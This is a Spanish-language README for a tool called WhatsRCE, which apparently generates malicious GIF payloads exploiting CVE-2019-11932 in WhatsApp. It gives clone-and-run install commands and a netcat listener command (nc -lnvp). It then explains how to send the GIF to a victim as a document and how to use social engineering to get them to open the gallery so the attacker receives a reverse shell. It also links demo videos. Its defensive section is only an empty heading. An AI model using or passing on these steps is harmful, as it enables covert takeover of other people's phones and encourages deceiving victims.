WhatsRCE
Este es un generador automatizado de payloads para CVE-2019-11932 (Ejecución remota de código en WhatsApp)
- Instalación automática de GCC (comando inofensivo, puedes comprobar que es de código abierto)
- Guardado en archivo .GIF
¿Cómo usarlo?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
¿Cómo obtener la shell?
- Solo envía el archivo .GIF al usuario víctima COMO DOCUMENTO, NO COMO IMAGEN
- Configura el nc / netcat en el puerto que estableciste en las herramientas de WhatsRCE {nc -lnvp your_port}
- Puedes usar el ataque de ingeniería social para que las víctimas se sientan atraídas a ejecutar este exploit
- dile a la víctima que abra la galería a través de WhatsApp y pídele que envíe cualquier foto (no es necesario, solo tiene que ir a la galería, no hay problema); después de unos segundos recibirás una conexión de shell desde la víctima
o simplemente mira esto
VÍDEO DEMO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
si el enlace anterior no es accesible
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
¿Cómo evitar este ataque?